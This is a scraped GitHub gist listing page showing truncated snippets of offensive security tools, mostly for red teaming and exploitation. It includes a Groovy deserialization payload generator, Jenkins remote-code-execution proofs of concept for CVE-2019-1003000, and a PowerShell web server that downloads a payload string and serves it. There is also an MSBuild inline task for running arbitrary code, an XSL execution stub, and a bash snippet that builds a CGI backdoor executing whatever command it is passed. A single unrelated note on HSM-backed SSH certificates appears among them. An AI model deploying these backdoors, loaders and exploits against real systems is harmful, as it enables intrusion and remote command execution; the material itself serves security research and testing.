Skip to content

Instantly share code, notes, and snippets.


Chris Gates carnal0wnage

View GitHub Profile
DiabloHorn /
Created Sep 9, 2017
Java class to generate a Groovy serialized payload
DiabloHorn -
For learning purposes we build the groovy payload ourselves instead of using
ysoserial. This helps us better understand the chain and the mechanisms
involved in exploiting this bug.
compile with:
javac -cp <path to groovy lib>
javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar
DiabloHorn /
Created Sep 9, 2017
Exploit for the DeserLab vulnerable implementation
#!/usr/bin/env python
DiabloHorn -
adamyordan /
Last active Jul 29, 2019
# Author: Adam Jordan
# Date: 2019-02-15
# Repository:
# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)
import argparse
import jenkins
akhil-reni / payload
Created Jul 26, 2019
Jenkins Metaprogramming RCE Create new user
View payload
cobbr / server.ps1
Last active Jan 30, 2020 — forked from obscuresec/dirtywebserver.ps1
Dirty PowerShell Webserver
View server.ps1
$mk = (new-object net.webclient).downloadstring("")
$Hso = New-Object Net.HttpListener
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
$Buf = [Text.Encoding]::UTF8.GetBytes($mk)
Arno0x / msbuild.xml
Created Nov 17, 2017
MSBuild project definition to execute arbitrary code from msbuild.exe
View msbuild.xml
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
<Target Name="Hello">
<SharpLauncher >
View YubiHSM2 Backed SSH Certificates
### I use HSM backed SSH certs and so can you. [why?: keys can be stolen, certs expire!]
1. Get a YubiHSM2 @
2. Follow this: [ Yes, you're going to have to install all the other yubico stuff too, yubico-connector, etc, ..] on your issuing machine, or airgapped machine.
3. Be content that you can now sign certificates with the HSM on the issuer/airgapped machine.
3. Update /etc/ssh/sshd_config on remote server to add:
TrustedUserCAKeys /etc/ssh/
AuthorizedPrincipalsFile /etc/ssh/auth_principals/%u
4. Add principals here:
View xsl-notepad.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="" ?>

Cumulus Toolkit Cliff Notes

By popular demand, here are my notes for running the demo I presented at Blackhat Arsenal 2017. These are not full instructions on how to setup the full environment, please let me know if you are interested in such a thing.


View gist:38dcff6a0975f148aa858e924d64c492
cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi